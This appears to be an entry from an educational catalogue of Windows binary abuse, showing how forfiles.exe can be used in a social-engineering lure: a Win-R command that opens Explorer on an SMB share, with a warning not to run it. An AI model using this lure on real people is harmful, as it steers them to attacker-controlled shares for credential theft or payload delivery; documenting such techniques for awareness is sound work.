← Back to forfiles.exe
Open Explorer to SMB share

Uses forfiles to invoke Explorer on an SMB UNC path. Helpful for lures that steer users into a network share.

1

Press Win-R

2

Type: forfiles /p C:\Windows\System32 /m notepad.exe /c 'cmd /c explorer \server\share'

3

Press Enter

Copied to clipboard!
⚠️ This is a demonstration - do not run this command!
Educational Example: This is a demonstration of what a social engineering attack might look like. Never run commands from untrusted sources. This example is for educational purposes only.